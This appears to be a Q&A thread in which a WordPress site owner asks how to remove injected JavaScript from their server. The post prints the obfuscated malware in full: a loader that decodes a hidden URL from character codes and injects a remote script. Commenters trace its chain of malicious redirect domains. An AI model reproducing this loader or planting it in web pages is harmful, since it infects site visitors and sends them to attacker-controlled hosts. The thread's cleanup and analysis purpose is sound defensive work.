# asap: malware removal javascript

Tags: javascript, malware

How i can verify my server on terminal and remove this malicious code?

```
var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}/
```

Comment: Hmm! It creates a script that has it's src point to [this script](https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=060)

Which also creates a script that points to [this script](https://withbestwishesjanny.com/follow)

Which ultimately redirects you to [this website](https://ticker.trasnaltemyrecords.com/cron.php?utm_camp=5&utm_click=4363&campid=235&red_id=6845&append=987432&u_click=56547&cpid=3472&rid=347342) (**thread carefuly here**)

Comment: Where does that code come from?

Comment: This code was introduced by a robot that injected it into several of my wordpress installations. Is there any bash (terminal) code to remove these lines of code from all files at the same time? Tried something with grep -rl "this code" | xargs sed -i "this code" however does not work because of the characters, I don't know.

Comment: https://blog.sucuri.net/2019/11/vulnerable-versions-of-adminer-as-a-universal-infection-vector.html

Comment: @JonasRafaelRossatto.It's connecting to (https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=060).   Try to block that site from connecting